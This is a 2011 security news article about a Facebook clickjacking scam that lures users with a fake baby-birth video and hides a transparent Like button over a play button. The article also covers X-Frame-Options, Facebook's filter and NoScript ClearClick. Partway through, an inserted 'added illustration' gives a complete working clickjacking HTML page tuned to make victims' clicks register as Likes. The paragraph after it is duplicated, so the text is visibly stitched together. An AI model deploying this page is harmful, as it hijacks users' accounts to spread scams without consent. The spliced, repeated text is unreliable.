May 28th, 2011, 10:58 GMT · By

New Clickjacking Attack Spreading on Facebook

Image caption: Facebook baby born amazing effect videos are a scam
Security researchers warn of a new clickjacking scam that spreads on Facebook by luring users with what purports to be a video of a baby being born.

The spam messages posted by victims of this attack read "Baby Born Amazing Effect - WebCamera" and contain a link that takes users to a page hosted at blogspot.com.

The page displays a video player thumbnail with a play button; clicking it, however, does not start a video but causes the user's browser to Like the page, which is how the message ends up posted under the victim's name and reaches their friends.

This is achieved through a technique known as clickjacking, or more formally user interface redressing, which abuses legitimate web features: a control from another site is loaded in an iframe and, with ordinary CSS, made invisible and layered over a decoy so that the victim's click lands on the hidden control instead.

In this case, the Facebook Like button, embedded in an iframe loaded from facebook.com, is made transparent using CSS and positioned over the play button. Because the iframe is served by Facebook, the browser sends the victim's Facebook session cookie with it, so when users click Play they are in fact clicking Like as themselves, with no further confirmation.
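As an added illustration, not code from the article or from the scam page itself, the following is the skeleton of a page that performs the overlay just described. The thumbnail image, the target page address (example.invalid) and the Like plugin embed URL are placeholders and assumptions; any embeddable third-party button that acts on the visitor's existing session would serve the same purpose. Opened in a browser that is logged in to Facebook, a click on the fake play button would register a real Like, so it should only ever be tried against a page you control.

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Baby Born Amazing Effect - WebCamera</title>
<style>
  /* Container sized like a video player; the decoy and the target are
     positioned inside it. thumb.jpg is a placeholder still image. */
  #player {
    position: relative; width: 480px; height: 360px;
    background: #000 url(thumb.jpg) center / cover no-repeat;
  }

  /* The decoy: a play button the victim believes they are clicking.
     It sits below the iframe in the stacking order, so it never
     receives the click itself. */
  #play {
    position: absolute; left: 200px; top: 140px; width: 80px; height: 80px;
    border-radius: 40px; background: rgba(255,255,255,0.85);
    font-size: 40px; line-height: 80px; text-align: center;
    cursor: pointer; z-index: 1;
  }

  /* The real target: the Like button iframe, fully transparent and stacked
     above the decoy so that the click lands on it. opacity:0 keeps the
     element hit-testable; visibility:hidden or display:none would not. The
     offsets put the word "Like" directly under the centre of the decoy. */
  #like {
    position: absolute; left: 200px; top: 168px; width: 90px; height: 25px;
    border: 0; opacity: 0; z-index: 2;
  }
</style>
</head>
<body>
<div id="player">
  <div id="play">&#9654;</div>
  <!-- Assumed Like plugin embed URL. Because the document is loaded from
       facebook.com, the victim's own Facebook cookies accompany it, and the
       Like is recorded against their account. -->
  <iframe id="like"
          src="https://www.facebook.com/plugins/like.php?href=https%3A%2F%2Fexample.invalid%2Fscam-page"
          scrolling="no"></iframe>
</div>
</body>
</html>
```

The same layout works against any page that allows itself to be framed. A site that never needs to be embedded defeats it by refusing framing, for example with an X-Frame-Options: DENY response header (or, in current browsers, a Content-Security-Policy frame-ancestors directive); the Like button exists precisely to be embedded in third-party pages, which is why that defence is not available to it.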

Because it involves only legitimate technologies (iframes and CSS), clickjacking is hard for websites and browsers alike to detect and block. A site that never needs to be embedded can refuse framing outright with the X-Frame-Options response header, but the Like button is designed to be embedded in third-party pages, so Facebook cannot apply that defence to it.

Facebook has recently introduced a clickjacking mitigation filter that detects unusual click patterns for Like buttons and forces users to confirm the action.

So far the system does not seem to make much of a difference, because it kicks in only after the scam has already affected a lot of people.

"It is like a chess match in that you have a plan of attack of your own and you expect certain things from the other side, but every so often there is going to be a move that you didn't expect and then you have to step back and adapt to it," Facebook's chief security officer, Mr. Joe Sullivan, told us in a recent interview.

Firefox users can protect themselves by installing the NoScript extension. NoScript is primarily designed to whitelist JavaScript by site, but it also includes protections against cross-site scripting (XSS), cross-site request forgery (CSRF) and, through its ClearClick feature, clickjacking: when a click lands on an embedded element that is hidden or obscured by other content, ClearClick reveals the element and asks the user to confirm the click.
